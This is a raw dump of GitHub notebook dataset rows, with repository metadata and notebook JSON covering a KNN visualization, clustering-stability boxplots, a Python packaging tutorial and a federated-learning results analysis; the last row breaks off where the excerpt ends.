hexsha
stringlengths
40
40
size
int64
6
14.9M
ext
stringclasses
1 value
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
6
260
max_stars_repo_name
stringlengths
6
119
max_stars_repo_head_hexsha
stringlengths
40
41
max_stars_repo_licenses
sequence
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
6
260
max_issues_repo_name
stringlengths
6
119
max_issues_repo_head_hexsha
stringlengths
40
41
max_issues_repo_licenses
sequence
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
6
260
max_forks_repo_name
stringlengths
6
119
max_forks_repo_head_hexsha
stringlengths
40
41
max_forks_repo_licenses
sequence
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
avg_line_length
float64
2
1.04M
max_line_length
int64
2
11.2M
alphanum_fraction
float64
0
1
cells
sequence
cell_types
sequence
cell_type_groups
sequence
e72d22b684ede1bf7ee23f2336b9c83f210d2d3d
29,895
ipynb
Jupyter Notebook
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
1
2021-11-21T18:17:04.000Z
2021-11-21T18:17:04.000Z
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
null
null
null
KNN_Explanation_Visual.ipynb
mmccown5/QCM_project
b0a5ce59959e45fb6e645e6bd95deb7af267d82e
[ "MIT" ]
null
null
null
103.086207
5,932
0.851079
[ [ [ "## Visual Explanation of KNN\nFor the class presentation, I use the following plots to discuss using k-nearest neighbors to estimate outcome based on a predictor variable. In this case, averages were calculated manually with k=3.\n", "_____no_output_____" ] ], [ [ "import pandas as pd\nfrom matplotlib import pyplot as plt", "_____no_output_____" ] ], [ [ "I load my example data. These are semi-random points I picked to give the plot non-linear data with some trend and grouping.", "_____no_output_____" ] ], [ [ "data = pd.read_csv(\"visual.txt\",sep=\"\\t\")\ndata.head()", "_____no_output_____" ] ], [ [ "Plot the example data with pyplot. Note that the scales are removed, as it doesn't matter for the purpose of the presentation.", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis1.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "Now add red points to represent new values of the putative predictor for which the outcome is unknown. The blue points will be used as training dataset while the red are treated as test points. First, I plot the test points at the bottom of the graph. 
(This was zero, but that changed the y range shown and I didn't like that.)", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\nplt.scatter([2,5.5,9.5], [0,0,0],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis2.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ], [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\nplt.scatter([2,5.5,9.5], [2,2,2],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis2b.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "Next, move the test points to the y value predicted by knn with k of 3. ", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\n\nax.tick_params(left = False, labelleft = False, bottom=False, labelbottom=False) \nplt.scatter(data.X, data.Y)\n\nplt.scatter([2,5.5,9.5], [3.8,8.5,4.7],color='red')\n\nplt.ylabel(\"Outcome\")\nplt.xlabel(\"Putative Predictor\")\n\nplt.savefig(\"vis3.png\",dpi=300)\nplt.show()\n", "_____no_output_____" ] ], [ [ "The figures are saved as vis1, vis 2, and vis3 and are added to my powerpoint.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72d297eda9898b7669a452849a5ea9526f37157
2,062
ipynb
Jupyter Notebook
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
1
2016-11-12T06:28:36.000Z
2016-11-12T06:28:36.000Z
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
null
null
null
python_list.ipynb
Juude/LearnTensorFlow
3f9dc6dd2645af32c1634e263a41e93c452c022b
[ "Apache-2.0" ]
1
2020-02-13T05:02:30.000Z
2020-02-13T05:02:30.000Z
16.23622
78
0.465082
[ [ [ "a = [1,3,5]", "_____no_output_____" ], [ "sum(a) / len(a)", "_____no_output_____" ], [ "b = True", "_____no_output_____" ], [ "not b", "_____no_output_____" ], [ "def find_mean(values):\n # TODO: Return the average of the values in the given Python list\n return sum(values) / len(values)", "_____no_output_____" ], [ "print(find_mean([1, 3, 4]))", "2.6666666666666665\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e72d3ca75c4d3364c112fc3bad0543b1f0e011d6
149,293
ipynb
Jupyter Notebook
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
2
2021-06-14T05:43:53.000Z
2021-07-17T20:15:58.000Z
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
null
null
null
notebooks/si-06-variance-impact-of-consensus-clustering.ipynb
QuantLaw/Measuring-Law-Over-Time
3285512b8bbdfdd4e7a4ec5950b451f86d0d8094
[ "CC-BY-4.0" ]
1
2021-06-06T21:49:36.000Z
2021-06-06T21:49:36.000Z
654.79386
37,400
0.952543
[ [ [ "# Impact of consensus clustering on stability", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport matplotlib.pylab as plt\nimport seaborn as sns\n", "_____no_output_____" ], [ "sns.set_style(\"whitegrid\")\nplt.rcParams['figure.figsize'] = (8,6)\nplt.rcParams['font.size'] = 20\n", "_____no_output_____" ] ], [ [ "# US", "_____no_output_____" ] ], [ [ "def make_boxplot(dataset, metric, ylabel, save_path=None):\n df = pd.read_pickle(f'../results/variance_impact_of_consensus_clustering_{dataset}.pickle')\n fig, ax = plt.subplots()\n ax.boxplot(\n [\n df.loc[metric,:].loc[i,:]['values'].tolist() \n for i in sorted(df.loc[metric,:].index.unique())\n ], \n notch=0,\n sym=\"\", \n medianprops=dict(color='r')\n )\n ax.set_xticklabels(sorted(df.loc[metric,:].index.unique()))\n plt.ylabel(ylabel)\n plt.xlabel(\"Runs for Consensus Clustering\")\n plt.tight_layout()\n if save_path is not None:\n plt.savefig(save_path)", "_____no_output_____" ], [ "make_boxplot('us_reg', 'NMI', 'Normalized Mutual Information',\n '../graphics/variance_impact_of_consensus_clustering_nmi_us_reg.pdf')", "_____no_output_____" ], [ "make_boxplot('us_reg', 'Rand', 'Adjusted Rand Index', \n '../graphics/variance_impact_of_consensus_clustering_rand_us_reg.pdf')", "_____no_output_____" ] ], [ [ "# DE", "_____no_output_____" ] ], [ [ "make_boxplot('de_reg', 'NMI', 'Normalized Mutual Information',\n '../graphics/variance_impact_of_consensus_clustering_nmi_de_reg.pdf')", "_____no_output_____" ], [ "make_boxplot('de_reg', 'Rand', 'Adjusted Rand Index', \n '../graphics/variance_impact_of_consensus_clustering_rand_de_reg.pdf')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72d42665f208e6c177230b03c61567745996763
20,320
ipynb
Jupyter Notebook
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
26
2018-04-24T13:37:33.000Z
2021-11-29T14:04:35.000Z
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
14
2020-10-07T11:21:20.000Z
2022-03-20T17:39:18.000Z
book/week_07/01-Package-structure.ipynb
fmaussion/scientific_programming
e757ba944f485b3754fbbe27e289ca03741bb6fa
[ "CC-BY-4.0" ]
14
2018-04-03T10:17:42.000Z
2021-11-08T14:33:06.000Z
38.412098
604
0.630709
[ [ [ "# 01 - Structure of a python package", "_____no_output_____" ], [ "*Python Zen: \"Namespaces are one honking great idea - let's do more of those!\"*\n\nWe introduced the concept of python modules in a [previous unit](../week_03/01-Import-Scopes). Today we are going into more details and will introduce Python \"**packages**\", which contain more than one module and are the structure used by all larger Python libraries.", "_____no_output_____" ], [ "## Revision: modules, namespaces and scopes", "_____no_output_____" ], [ "Python [modules](https://docs.python.org/3/tutorial/modules.html) simply are ``*.py`` files. They can contain executable statements as well as function definitions, in any order.\n\nFor example, a module called ``mymodule.py`` could look like:\n\n```python\nimport numpy as np\n\npi = 3.14\nprint('Module top level 1')\n\ndef circle_area(radius):\n \"\"\"A cool function\"\"\"\n print('In function')\n return pi * radius**2\n\nprint('Module top level 2')\n\nif __name__ == '__main__':\n \n print('In main script')\n print('Area of circle: {}'.format(circle_area(10)))\n```", "_____no_output_____" ], [ "```{exercise}\nCan you predict what will be printed on screen if (i) you run ``import mymodule`` in a python interpreter, or (ii) run ``python mymodule.py`` from the command line? If not, try it yourself!\n```", "_____no_output_____" ], [ "The example should be self-explanatory, and we will discuss it in class. If you have any question at this point don't hesitate to ask me! See [this tutorial from RealPython](https://realpython.com/run-python-scripts/) for more details.", "_____no_output_____" ], [ "Continue to read only after the mechanisms happening in the example above are fully understood.\n\n...\n\nOK? 
Let's go on then.", "_____no_output_____" ], [ "### More on scopes ", "_____no_output_____" ], [ "Here is a more intricate example for ``mymodule.py``:\n\n```python\ndef print_n():\n print('The number N in the function is: {}'.format(N))\n\nN = 10\nprint_n()\n```", "_____no_output_____" ], [ "```{exercise}\nWill ``import mymodule`` run or will it fail with an error? Think about it for a little while, and if you don't know for sure, try it out!\n```\n\n\n...\n\n\n(spoiler protection)\n\n...\n", "_____no_output_____" ], [ "Why is this example working, even if ``N`` is defined below the function definition? Here again, the *order* at which things are happening when the module is imported is the important trick:\n\n1. the function ``print_n`` is detected and interpreted, but *not* executed (nobody called it)\n2. the variable ``N`` is assigned the value ``10``. It is now available at the module scope, i.e. an external module import would allow the command ``from mymodule import N`` to run without error\n3. The function ``print_n`` is called. In this function, the interpreter seeks for a local scope variable (i.e. at the function level) called ``N``. It doesn't find it, and therefore looks at the module level. Nice! A variable called ``N`` is found at the module level and printed.\n\nNote that this will not always work. See the following example which builds upon the previous one:", "_____no_output_____" ] ], [ [ "def print_n():\n print('The number N in the function is: {}'.format(N))\n N += 1\n\nN = 10\nprint_n()", "_____no_output_____" ] ], [ [ "So how is this example different to the one above, which worked fine as explained? We just added a line *below* the one that used to work before. So now there is a variable ``N`` in the function, and it overrides the module-level one. 
The python interpreter detects that variable and raises an error at execution, independent to whether or not there is a global variable ``N`` available.", "_____no_output_____" ], [ "Even if it might work to define module level variables anywhere, the recommended order of code in a module is:\n1. import statements\n2. module level variable definitions\n3. functions\n4. if necessary (rare): one or more function calls (e.g. to initialize some global values), `__main__`\n\nBut... If module functions can read variables at the module level, can they also change them? Here is another example messing around with **global** and **local** variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 1\n\ndef func(x):\n x = x + y\n return x\n\nprint(func(3))\nprint(func(x))\nprint(x)\nprint(y)", "_____no_output_____" ] ], [ [ "What can we learn from this example? That the local (function) scope variable ``x`` has nothing to do with the global scope variable ``x``. For the python interpreter, both are unrelated and their name is irrelevant. What is relevant though is which scope they are attached to (if you are interested to know which variables are currently available in your scope, check the built-in functions [dir()](https://docs.python.org/3/library/functions.html#dir), [globals()](https://docs.python.org/3/library/functions.html#globals) and [locals()](https://docs.python.org/3/library/functions.html#locals)).", "_____no_output_____" ], [ "### The ``global`` statement ", "_____no_output_____" ], [ "In special cases, it might be useful for a function to change the value of a global variable. Examples include package level parameter sets such as options and model parameters which will change the behavior of the package after being set. 
For example, see numpy's [set_printoptions](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.set_printoptions.html) function:", "_____no_output_____" ] ], [ [ "import numpy as np\na = np.array([1.123456789])\nprint(a)\nnp.set_printoptions(precision=4)\nprint(a)", "_____no_output_____" ] ], [ [ "We changed the value of a variable at the module level (we don't know its name but it isn't relevant here) which is now taken into account by the numpy print function.", "_____no_output_____" ], [ "Let's say we'd like to have a counter of the number of times a function has been called. We can do this with the following syntax:", "_____no_output_____" ] ], [ [ "count = 0\n\ndef func():\n global count # without this, count would be local!\n count += 1\n\nfunc()\nfunc()\nprint(count)", "_____no_output_____" ] ], [ [ "Note that in practice, global variables that need updating are rarely single integers or floats like in this example. The reasons for this will be explained later on, once you've learned more about python packages and the import system. ", "_____no_output_____" ], [ "### Are global variables truly \"global\" in python? ", "_____no_output_____" ], [ "If by this question we mean \"global\" as available everywhere in any python script or interpreter, the short answer is **no, there is no such thing as a \"global\" variable in python**. The term \"global variable\" in python always refers to the module level, while \"local variables\" refer to the embedded scope (often, a function). \n\nIf you want to have access to a module's top-level variable (or function), you *have* to import it. 
This system ensures very clear and unpolluted **namespaces**, where everything can be traced to its source:", "_____no_output_____" ] ], [ [ "import numpy\nimport math\nimport scipy\n\nprint(math.pi, 'from the math module')\nprint(numpy.pi, 'from the numpy package')\nprint(scipy.pi, 'from the scipy package')", "_____no_output_____" ] ], [ [ "The only exception to the import rule are [built-in functions](https://docs.python.org/3/library/functions.html), which are available everywhere and have their own scope. If you want to know more about the four different python scopes, read this [blog post by Sebastian Raschka](http://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html#scope-resolution-for-variable-names-via-the-legb-rule): A Beginner's Guide to Python's Namespaces, Scope Resolution, and the LEGB Rule.", "_____no_output_____" ], [ "## Packages ", "_____no_output_____" ], [ "*From the [documentation](https://docs.python.org/3/tutorial/modules.html#packages):*\n \nPackages are a way of structuring Python’s module namespace by using \"dotted module names\". For example, the module name ``A.B`` designates a submodule named ``B`` in a package named ``A``. Just like the use of modules saves the authors of different modules from having to worry about each other’s global variable names, the use of dotted module names saves the authors of multi-module packages like NumPy or Xarray from having to worry about each other’s module names. ", "_____no_output_____" ], [ "Packages can also be used to organize bigger projects into thematic groups. 
SciPy for example has more than 12 subpackages, some of them being organized in sub-subpackages.", "_____no_output_____" ], [ "Now read the few paragraphs from the python documentation on [packages](https://docs.python.org/3/tutorial/modules.html#packages) *(estimated reading time: 5 min)*.", "_____no_output_____" ], [ "You are maybe asking yourself: **what can I use packages for?** Well, for one, it is necessary to understand their basic structure in order to be able to read someone else's code, for example in the ``xarray`` library. Second, because I think that you have everything to win by organizing your personal code (analysis routines, plot functions...) into a single package that you can import from anywhere (e.g. in a Jupyter Notebook or from a different working directory). Therefore, the ClimVis project will bring you to write a small package.", "_____no_output_____" ], [ "### The structure of a package", "_____no_output_____" ], [ "I've written a simple package template called \"scispack\" to help you getting started with your future packages. You will find the code [on github](https://github.com/fmaussion/scispack) and a link to download it (green button in the top right). It is released in the public domain, feel free to use it for your projects. You will have more time to get familiar with it during the assignments (the `climvis` package is based on it). Here, I'll simply repeat its basic structure:\n\n**Directory root (``./``)**\n\n- ``.gitignore``: for git users only\n- ``LICENSE.txt``: [always](https://help.github.com/articles/licensing-a-repository/) \n license your code\n- ``README.md``: this page\n- ``setup.py``: this is what makes your package installable by ``pip``. It contains \n a set of simple instructions regarding e.g. 
the name of the package, it's version\n number, or where to find command line scripts\n \n**The actual package (``./scispack``)**\n\n- ``__init__.py``: tells python that the directory is a package and enables\n the \"dotted module names\" import syntax. It is often empty, but here\n we added some entry points to the package's API and the version string.\n- ``cfg.py``, ``utils.py`` and ``cli.py``: the modules\n- ``cli.py``: entry point for the command line interface \n- ``cfg.py``: container module for the package parameters and constants\n\n**The tests (``./scispack/tests``)**\n\nOne test file per module. Their name has to start with ``test_`` in order to be \ndetected by pytest.", "_____no_output_____" ], [ "### Installing a local package", "_____no_output_____" ], [ "By starting your python interpreter from the root directory of a package (for example the template package) you will have access to the familiar syntax (e.g. ``from scispack.utils import area_of_circle``). But if you start an interpreter from anywhere else the package won't be available. \n\nRemember what we wrote about the [python sys.path](content:syspath) a couple of weeks ago? In order to \"install\" the package we have two options:\n1. we add the path to the package directory to `sys.path`\n2. we copy the package into a folder already listed in `sys.path`\n\nFrom the two solutions, number 2 is by far the easiest and most sustainable. In fact, this is what happens when you do ``pip install packagename`` or ``conda install packagename``. The two commands are very similar in that they are looking for the package in an online repository, download it and copy it in the current environment's `sys.path`. If you want to know where an installed package is located, you can do:", "_____no_output_____" ] ], [ [ "import numpy\nnumpy.__file__", "_____no_output_____" ] ], [ [ "The same installation options are offered to us for our self-made package. 
The simplest is to navigate to our package's root directory and run:\n\n $ pip install -e .\n \nThe ``pip install .`` command will look for a ``setup.py`` file **in the current folder** (this is why the dot `.` is used) and if found, use it to determine the package's name and other installation options. The ``-e`` optional argument installs the package in \"editable\" or \"development\" mode. In simple terms, this option will create a [symbolic link](https://en.wikipedia.org/wiki/Symbolic_link) to the package directory instead of copying the files. Therefore, any changes to the code will always be available the next time you open a new python interpreter.\n\n```{tip}\n``pip install -e .`` is the recommended way to install any local package, in pip or in conda environments. At the university (or on computers where you don't have the super-user permissions), use ``pip install --user -e .``\n```", "_____no_output_____" ], [ "### Advanced applications: packaging and sharing code", "_____no_output_____" ], [ "The simple template you are going to start with in `ClimVis` is not fundamentally different from larger packages like xarray or numpy. There are a couple of big differences though, and I'll list some of them here:\n- [rioxarray](https://github.com/corteva/rioxarray) (as a pure python package) has a ``setup.py`` much like yours. It will have some more options related to the version control of the package and will have a separate folder for HTML documentation. The rest of the root directory files are related to testing and continuous integration. \n- [numpy](https://github.com/numpy/numpy) (as a mix of python and C code) will be quite more complex to deploy. Installing a development version of numpy will imply some compilation of C code, which is quite easy to do on linux machines but needs quite some time.\n\nTools like ``pip`` or ``conda`` hide all these things from the users, fortunately. 
They ship pre-compiled binaries and take care of most of the details in the background. This hasn't always been that easy though, and a recent post by [xkcd](https://xkcd.com/1987/) reminds us that installing python packages can still be a mess sometimes:", "_____no_output_____" ], [ "![img](https://imgs.xkcd.com/comics/python_environment.png)", "_____no_output_____" ], [ "## Take home points", "_____no_output_____" ], [ "- python has very clear rules regarding the scope of variables, leading to clearly defined namespaces\n- there are no \"truely global\" variables in python, only namespaces\n- a package is a way to organize several modules under the same namespace. It allows to construct nested modules, like ``from A.B import C``\n- make your package installable simply requires to comply to a couple of simple rules, including defining a ``setup.py`` installation file at the root directory folder\n- I recommend to install local packages with ``pip install -e .``", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72d44a42db792df826e6118ef372e6a904d93bc
464
ipynb
Jupyter Notebook
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
sashabaranov/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
null
null
null
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
sashabaranov/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
1
2018-10-31T15:54:37.000Z
2018-10-31T15:54:37.000Z
nbgrader/tests/preprocessors/files/bad-markdown-cell-1.ipynb
zonca/nbgrader
6d260e9f63cef15073a4540fe34ef196e36c4c94
[ "BSD-3-Clause-Clear" ]
null
null
null
14.967742
29
0.491379
[ [ [ "this is a markdown cell", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e72d498ac2b70d15449d707c247f6e9c849a1332
23,129
ipynb
Jupyter Notebook
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
7
2022-03-15T23:27:57.000Z
2022-03-30T06:15:45.000Z
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
null
null
null
ipynb/Digits vary budget distribution.ipynb
illidanlab/SplitMix
4297aa01a90101792bfb482fd96a61f51766d97a
[ "MIT" ]
1
2022-03-22T11:28:36.000Z
2022-03-22T11:28:36.000Z
30.675066
121
0.523672
[ [ [ "The experiment was raised by the ICLR2022 reviewers.\n\nWe aim to evaluate the methods in different experiment settings.", "_____no_output_____" ] ], [ [ "import os, sys\nimport pandas as pd\nimport wandb\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom IPython.display import display", "_____no_output_____" ], [ "sns.set_style(\"ticks\")\ncmap = sns.color_palette()\nsns.set_palette(sns.color_palette())", "_____no_output_____" ], [ "cache_path = './fig/flops_acc_curve'\nif not os.path.exists(cache_path):\n os.makedirs(cache_path)", "_____no_output_____" ], [ "data = 'Digits'\n\nsweep_dict = {\n 'FedAvg': \"jyhong/SplitMix_release/sweeps/8g8s7kp4\",\n 'SHeteroFL': \"jyhong/SplitMix_release/sweeps/0lh7d73x\",\n 'SHeteroFL vary budgets': \"jyhong/SplitMix_release/sweeps/jbak4jzs\",\n 'HeteroFL ln': \"jyhong/SplitMix_release/sweeps/a36ramy7\",\n 'SplitMix': \"jyhong/SplitMix_release/sweeps/3wr7bsxb\",\n 'SplitMix vary budget': \"jyhong/SplitMix_release/sweeps/8g0irs68\",\n 'SplitMix ln': \"jyhong/SplitMix_release/sweeps/wz10puq8\",\n}", "_____no_output_____" ], [ "agg_df_dict = {}", "_____no_output_____" ], [ "def get_slimmabe_ratios(mode: str):\n ps = mode.split('-')\n slimmable_ratios = []\n for p in ps:\n if 'd' in p:\n p, q = p.split('d') # p: 1/p-net; q: weight of the net in samples\n p, q = int(p), int(q)\n p = p * 1. / q\n else:\n p = int(p)\n slimmable_ratios.append(1. 
/ p)\n# print(f\"Set slim ratios: {self.slimmable_ratios} by mode: {mode}\")\n return slimmable_ratios", "_____no_output_____" ], [ "def fetch_config_summary(runs, config_keys, summary_keys):\n df_dict = defaultdict(list)\n for run in runs:\n if run.state != 'finished':\n print(\"WARN: run not finished yet\")\n history_len = 0\n missing_sum_key = []\n for k in summary_keys:\n if k in run.summary:\n h = run.summary[k]\n df_dict[k].append(h)\n else:\n missing_sum_key.append(k)\n break\n if len(missing_sum_key) > 0:\n print(f\"missing key: {missing_sum_key}\")\n continue\n for k in config_keys:\n df_dict[k].append(run.config[k])\n return df_dict", "_____no_output_____" ] ], [ [ "## FedAvg", "_____no_output_____" ] ], [ [ "mode = 'FedAvg'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])", "_____no_output_____" ], [ "df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['width_scale'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndf = pd.DataFrame(df_dict)\ndf['mode'] = mode\ndf['width_scale'] = df['width_scale'] * 100\ndf['width'] = df['width_scale']\ndf['slim_ratios'] = 'w/o constraint'\n\nagg_df_dict[mode] = df # [df['slim_ratio'] == 1.0]", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o')\nax.set(xticks=df['width'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ] ], [ [ "## SHeteroFL", "_____no_output_____" ] ], [ [ "mode = 'SHeteroFL'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])", "_____no_output_____" ], [ "df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndf = pd.DataFrame(df_dict)\ndf['test_slim_ratio'] = df['test_slim_ratio'] * 100\ndf['width'] = df['test_slim_ratio']\ndf['slim_ratios'] = 
'8-4-2-1'\n\n# df['mode'] = mode\n# agg_df_dict[mode] = df[df['slim_sch'] == 'group_size']\n\ndf['mode'] = mode\nagg_df_dict[mode] = df\n# agg_df_dict['S'+mode] = df[df['slim_sch'] == 'group_slimmable']", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='test_slim_ratio', y='avg test acc', \n marker='o')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ], [ "mode = 'SHeteroFL vary budgets'\napi = wandb.Api()\nsweep = api.sweep(sweep_dict[mode])\n\ndf_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n)\ndel_idxs = []\nfor idx in range(len(df_dict['slim_ratios'])):\n slim_ratios = get_slimmabe_ratios(df_dict['slim_ratios'][idx])\n # print(df_dict['slim_ratios'][idx], slim_ratios)\n if df_dict['test_slim_ratio'][idx] not in slim_ratios:\n # print(\"del\", idx, df_dict['test_slim_ratio'][idx])\n del_idxs.append(idx)\nfor k in df_dict:\n df_dict[k] = [v for i, v in enumerate(df_dict[k]) if i not in del_idxs]\ndf = pd.DataFrame(df_dict)\ndf['test_slim_ratio'] = df['test_slim_ratio'] * 100\ndf['width'] = df['test_slim_ratio']\n\ndf['mode'] = 'SHeteroFL'\nagg_df_dict[mode] = df # [df['slim_sch'] == 'group_slimmable']", "_____no_output_____" ], [ "sns.lineplot(data=df, x='width', y='avg test acc', hue='slim_ratios', marker='o')\nplt.grid(True)", "_____no_output_____" ] ], [ [ "## Split-Mix", "_____no_output_____" ] ], [ [ "dfs = []\n# for atom_slim_ratio in [0.125, 0.25]:\nfor mode in ['SplitMix']: # , 'SplitMix incr']:\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'atom_slim_ratio'], \n summary_keys = ['avg test acc', 'GFLOPs', 
'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = mode\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df['slim_ratios'] = '8-4-2-1'\n dfs.append(df)\n agg_df_dict[mode] = df\n \ndf = pd.concat(dfs)", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='test_slim_ratio', y='avg test acc', marker='o')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ], [ "for mode in ['SplitMix vary budget']:\n # 'SplitMix step=0.25 non-exp'\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'atom_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = 'SplitMix'\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df = df[df['slim_ratios'] != '8-4-2-1']\n agg_df_dict[mode] = df", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1)\n# for slim_ratio, val_accs in zip(df_dict['slim_ratio'], df_dict['val_acc']):\n# plt.plot(val_accs)\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o', hue='slim_ratios')\nax.set(xticks=df['test_slim_ratio'].unique())\n# ax.set(xlim=(0, 150), ylim=(0.3, 0.9))\nax.grid(True)", "_____no_output_____" ] ], [ [ "## Aggregation", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])", "_____no_output_____" ], [ "cmap = sns.color_palette(as_cmap=True)\nlen(cmap)", 